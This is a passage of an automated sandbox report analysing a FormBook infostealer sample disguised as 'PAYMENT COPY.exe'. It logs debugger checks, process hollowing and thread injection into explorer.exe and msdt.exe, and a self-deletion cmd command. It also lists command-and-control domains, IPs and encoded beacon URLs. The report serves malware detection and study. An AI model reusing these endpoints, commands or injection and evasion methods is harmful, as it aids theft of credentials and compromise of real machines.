          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEB02A mov eax, dword ptr fs:[00000030h]5_2_04CEB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEB02A mov eax, dword ptr fs:[00000030h]5_2_04CEB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0002D mov eax, dword ptr fs:[00000030h]5_2_04D0002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0002D mov eax, dword ptr fs:[00000030h]5_2_04D0002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0002D mov eax, dword ptr fs:[00000030h]5_2_04D0002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0002D mov eax, dword ptr fs:[00000030h]5_2_04D0002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0002D mov eax, dword ptr fs:[00000030h]5_2_04D0002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDB1E1 mov eax, dword ptr fs:[00000030h]5_2_04CDB1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDB1E1 mov eax, dword ptr fs:[00000030h]5_2_04CDB1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDB1E1 mov eax, dword ptr fs:[00000030h]5_2_04CDB1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D641E8 mov eax, dword ptr fs:[00000030h]5_2_04D641E8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D02990 mov eax, dword ptr fs:[00000030h]5_2_04D02990
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFC182 mov eax, dword ptr fs:[00000030h]5_2_04CFC182
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0A185 mov eax, dword ptr fs:[00000030h]5_2_04D0A185
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D551BE mov eax, dword ptr fs:[00000030h]5_2_04D551BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D551BE mov eax, dword ptr fs:[00000030h]5_2_04D551BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D551BE mov eax, dword ptr fs:[00000030h]5_2_04D551BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D551BE mov eax, dword ptr fs:[00000030h]5_2_04D551BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D061A0 mov eax, dword ptr fs:[00000030h]5_2_04D061A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D061A0 mov eax, dword ptr fs:[00000030h]5_2_04D061A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D569A6 mov eax, dword ptr fs:[00000030h]5_2_04D569A6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D949A4 mov eax, dword ptr fs:[00000030h]5_2_04D949A4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D949A4 mov eax, dword ptr fs:[00000030h]5_2_04D949A4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D949A4 mov eax, dword ptr fs:[00000030h]5_2_04D949A4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D949A4 mov eax, dword ptr fs:[00000030h]5_2_04D949A4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFB944 mov eax, dword ptr fs:[00000030h]5_2_04CFB944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFB944 mov eax, dword ptr fs:[00000030h]5_2_04CFB944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDC962 mov eax, dword ptr fs:[00000030h]5_2_04CDC962
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDB171 mov eax, dword ptr fs:[00000030h]5_2_04CDB171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDB171 mov eax, dword ptr fs:[00000030h]5_2_04CDB171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD9100 mov eax, dword ptr fs:[00000030h]5_2_04CD9100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD9100 mov eax, dword ptr fs:[00000030h]5_2_04CD9100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD9100 mov eax, dword ptr fs:[00000030h]5_2_04CD9100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0513A mov eax, dword ptr fs:[00000030h]5_2_04D0513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0513A mov eax, dword ptr fs:[00000030h]5_2_04D0513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF4120 mov eax, dword ptr fs:[00000030h]5_2_04CF4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF4120 mov eax, dword ptr fs:[00000030h]5_2_04CF4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF4120 mov eax, dword ptr fs:[00000030h]5_2_04CF4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF4120 mov eax, dword ptr fs:[00000030h]5_2_04CF4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF4120 mov ecx, dword ptr fs:[00000030h]5_2_04CF4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D02ACB mov eax, dword ptr fs:[00000030h]5_2_04D02ACB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D02AE4 mov eax, dword ptr fs:[00000030h]5_2_04D02AE4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0D294 mov eax, dword ptr fs:[00000030h]5_2_04D0D294
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0D294 mov eax, dword ptr fs:[00000030h]5_2_04D0D294
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0FAB0 mov eax, dword ptr fs:[00000030h]5_2_04D0FAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD52A5 mov eax, dword ptr fs:[00000030h]5_2_04CD52A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD52A5 mov eax, dword ptr fs:[00000030h]5_2_04CD52A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD52A5 mov eax, dword ptr fs:[00000030h]5_2_04CD52A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD52A5 mov eax, dword ptr fs:[00000030h]5_2_04CD52A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD52A5 mov eax, dword ptr fs:[00000030h]5_2_04CD52A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEAAB0 mov eax, dword ptr fs:[00000030h]5_2_04CEAAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEAAB0 mov eax, dword ptr fs:[00000030h]5_2_04CEAAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D64257 mov eax, dword ptr fs:[00000030h]5_2_04D64257
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9EA55 mov eax, dword ptr fs:[00000030h]5_2_04D9EA55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD9240 mov eax, dword ptr fs:[00000030h]5_2_04CD9240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD9240 mov eax, dword ptr fs:[00000030h]5_2_04CD9240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD9240 mov eax, dword ptr fs:[00000030h]5_2_04CD9240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD9240 mov eax, dword ptr fs:[00000030h]5_2_04CD9240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1927A mov eax, dword ptr fs:[00000030h]5_2_04D1927A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D8B260 mov eax, dword ptr fs:[00000030h]5_2_04D8B260
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.sportfest40.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.244.230.236 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.kakavjesajt.com
          Source: C:\Windows\explorer.exeDomain query: www.nescleanups.com
          Source: C:\Windows\explorer.exeDomain query: www.llmav.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 23.225.41.92 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 52.79.124.173 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.stripepayment.online
          Source: C:\Windows\explorer.exeNetwork Connect: 176.104.107.18 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.beyoncos.com
          Source: C:\Windows\explorer.exeDomain query: www.35efb510815e.com
          Source: C:\Windows\explorer.exeNetwork Connect: 167.114.6.31 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.360caiyin.com
          Source: C:\Windows\explorer.exeDomain query: www.mg-izkerr8.net
          Source: C:\Windows\explorer.exeNetwork Connect: 14.129.120.32 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cursosdigitaisbr.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.28.135 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cjaccessories.net
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_709B1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,1_2_709B1000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: unknown target: C:\Users\user\Desktop\PAYMENT COPY.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3440Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: FF0000Jump to behavior
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess created: C:\Users\user\Desktop\PAYMENT COPY.exe 'C:\Users\user\Desktop\PAYMENT COPY.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PAYMENT COPY.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000002.594810965.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.594985582.0000000003560000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.594810965.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.594985582.0000000003560000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.594810965.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.594985582.0000000003560000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000004.00000002.594810965.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.594985582.0000000003560000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion3Input Capture1Security Software Discovery141Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385291 Sample: PAYMENT COPY.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 31 www.mg-izkerr8.net 2->31 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 9 other signatures 2->45 11 PAYMENT COPY.exe 18 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\Temp\...\ek0j.dll, PE32 11->29 dropped 57 Maps a DLL or memory area into another process 11->57 15 PAYMENT COPY.exe 11->15         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 15->59 61 Maps a DLL or memory area into another process 15->61 63 Sample uses process hollowing technique 15->63 65 Queues an APC in another process (thread injection) 15->65 18 explorer.exe 15->18 injected process9 dnsIp10 33 cursosdigitaisbr.com 167.114.6.31, 49742, 80 OVHFR Canada 18->33 35 kakavjesajt.com 176.104.107.18, 49730, 80 NINETRS Serbia 18->35 37 13 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 49 Performs DNS queries to domains with low reputation 18->49 22 msdt.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PAYMENT COPY.exe32%VirustotalBrowse
          PAYMENT COPY.exe27%ReversingLabsWin32.Trojan.Wacatac

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll4%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.1.PAYMENT COPY.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.msdt.exe.51e7960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.2.PAYMENT COPY.exe.2650000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.msdt.exe.e45378.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.2.PAYMENT COPY.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.beyoncos.com0%VirustotalBrowse
          kakavjesajt.com0%VirustotalBrowse
          www.sportfest40.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.cjaccessories.net/eqas/?Kzrx=zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==&4h3=vZRDNDdpalAdz80%Avira URL Cloudsafe
          http://www.beyoncos.com/eqas/?Kzrx=vogt4SdM7257j7Tk1uEKvDVNcysLCgoPP/omvU9RbfjhJlgcGqamOKpa157N0oGBpfPcf/L32A==&4h3=vZRDNDdpalAdz80%Avira URL Cloudsafe
          http://www.35efb510815e.com/eqas/?Kzrx=+pdiEsaPT2Qcmu2ts2xxLdHpIsIAjIekwLbYEBSMYRvbotqJwTsf/hFk1ceM/lb+HZzWB3Gpcg==&4h3=vZRDNDdpalAdz80%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sportfest40.com/eqas/?Kzrx=5vTDjg0AbqyZCldj/4uhpy3uniwA6wzjOzlj8Zy6y3xAduLQBKf0xYSENAev/AVhLePpE/aK2w==&4h3=vZRDNDdpalAdz80%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://181ue.com/sq.html?entry=0%Avira URL Cloudsafe
          www.cursosdigitaisbr.com/eqas/100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.cursosdigitaisbr.com/eqas/?Kzrx=967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==&4h3=vZRDNDdpalAdz8100%Avira URL Cloudmalware
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.kakavjesajt.com/eqas/?Kzrx=2WJx48jh/thZFm4UaW0+TWvb4qp7q1IcEsHJj26+PoNJlpUOGtb5NswHfLJoC/AYmsRkDoJx/Q==&4h3=vZRDNDdpalAdz80%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          https://www.8dq98.com/enter/index.html0%Avira URL Cloudsafe
          http://www.llmav.xyz/eqas/?Kzrx=ZOpWeYl13G0nYt67dVF2CnLu74JWwlwH6kqD7vFNiwsDSsXFN4+zplc98svsYfoyCRsuDbeIEw==&4h3=vZRDNDdpalAdz80%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.beyoncos.com
          14.129.120.32
          truetrueunknown
          kakavjesajt.com
          176.104.107.18
          truetrueunknown
          www.sportfest40.com
          104.21.28.135
          truetrueunknown
          www.mg-izkerr8.net
          52.79.124.173
          truetrue
            unknown
            www.llmav.xyz
            35.244.230.236
            truefalse
              unknown
              shops.myshopify.com
              23.227.38.74
              truetrue
                unknown
                cursosdigitaisbr.com
                167.114.6.31
                truetrue
                  unknown
                  34.anxin58.com
                  23.225.41.92
                  truetrue
                    unknown
                    www.35efb510815e.com
                    unknown
                    unknowntrue
                      unknown
                      www.360caiyin.com
                      unknown
                      unknowntrue
                        unknown
                        www.kakavjesajt.com
                        unknown
                        unknowntrue
                          unknown
                          www.nescleanups.com
                          unknown
                          unknowntrue
                            unknown
                            www.cursosdigitaisbr.com
                            unknown
                            unknowntrue
                              unknown
                              www.stripepayment.online
                              unknown
                              unknowntrue
                                unknown
                                www.cjaccessories.net
                                unknown
                                unknowntrue
                                  unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.cjaccessories.net/eqas/?Kzrx=zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==&4h3=vZRDNDdpalAdz8true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.beyoncos.com/eqas/?Kzrx=vogt4SdM7257j7Tk1uEKvDVNcysLCgoPP/omvU9RbfjhJlgcGqamOKpa157N0oGBpfPcf/L32A==&4h3=vZRDNDdpalAdz8true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.35efb510815e.com/eqas/?Kzrx=+pdiEsaPT2Qcmu2ts2xxLdHpIsIAjIekwLbYEBSMYRvbotqJwTsf/hFk1ceM/lb+HZzWB3Gpcg==&4h3=vZRDNDdpalAdz8true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.sportfest40.com/eqas/?Kzrx=5vTDjg0AbqyZCldj/4uhpy3uniwA6wzjOzlj8Zy6y3xAduLQBKf0xYSENAev/AVhLePpE/aK2w==&4h3=vZRDNDdpalAdz8true
                                  • Avira URL Cloud: safe
                                  unknown
                                  www.cursosdigitaisbr.com/eqas/true
                                  • Avira URL Cloud: malware
                                  low
                                  http://www.cursosdigitaisbr.com/eqas/?Kzrx=967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==&4h3=vZRDNDdpalAdz8true
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.kakavjesajt.com/eqas/?Kzrx=2WJx48jh/thZFm4UaW0+TWvb4qp7q1IcEsHJj26+PoNJlpUOGtb5NswHfLJoC/AYmsRkDoJx/Q==&4h3=vZRDNDdpalAdz8true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.llmav.xyz/eqas/?Kzrx=ZOpWeYl13G0nYt67dVF2CnLu74JWwlwH6kqD7vFNiwsDSsXFN4+zplc98svsYfoyCRsuDbeIEw==&4h3=vZRDNDdpalAdz8false
                                  • Avira URL Cloud: safe
                                  unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000002.594277957.000000000095C000.00000004.00000020.sdmpfalse
                                    high
                                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.fontbureau.comexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                          high
                                          https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.jsmsdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                              high
                                              https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.jsmsdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
